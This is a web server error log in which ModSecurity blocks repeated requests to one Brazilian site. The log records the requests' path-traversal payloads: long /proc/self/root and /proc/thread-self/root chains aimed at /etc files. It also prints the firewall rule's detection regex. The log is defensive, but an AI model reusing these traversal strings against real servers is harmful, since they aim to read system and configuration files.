[Fri Mar 20 04:09:46.952813 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:43488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzyurninkcc-iUj5AoxxQAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:10:33.435484 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:53598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzy6RCii7xarUs8iHY5QAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:10:38.307697 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:49766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzy7uoXxyEfFpUF8f9YNwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:10:46.572706 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:53538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzy9bninkcc-iUj5AoyAQAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:10:51.699043 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:57806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzy-9a6ubjKNq_cu4ajfAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:10:56.329801 2026] [mime_magic:error] [pid 31215:tid 140411741927168] (70014)End of file found: [client 57.141.18.15:41332] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:10:56.341915 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 91.134.36.210:48648] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:11:20.769794 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 57.141.18.78:42130] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:11:26.410918 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:51066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzHvHIg5MgXLBnicPPxwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:12:09.240086 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.241.31:57814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzSfXLqtnMIWvjpaJt7AAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:14.796078 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:60008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzTl1pVZ5mVmJwsFMF0wAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:16.036261 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:60012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzUNa6ubjKNq_cu4ajnQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:17.430198 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:54438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzUV1pVZ5mVmJwsFMF1AAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:20.732342 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.241.31:54450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzVPHIg5MgXLBnicPP4gAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:12:22.078186 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.241.31:54464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzVgF0L0L-SsrnPo48ygAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:24.266918 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:54478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzVwF0L0L-SsrnPo48zgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:12:30.125567 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:54492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzXvXLqtnMIWvjpaJt-gAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:12:34.703063 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:35318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzYhCii7xarUs8iHY5hQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:36.003461 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:35326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzZAF0L0L-SsrnPo480QAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:37.351841 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:43648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzZRCii7xarUs8iHY5hgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:39.337005 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:43654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzZuoXxyEfFpUF8f9YaAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:40.758184 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:43658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzaPqxLDW4GITHUkS2rgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:42.071535 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.241.31:43666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzavHIg5MgXLBnicPP6QAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:12:47.747476 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:43678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzbxCii7xarUs8iHY5jQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
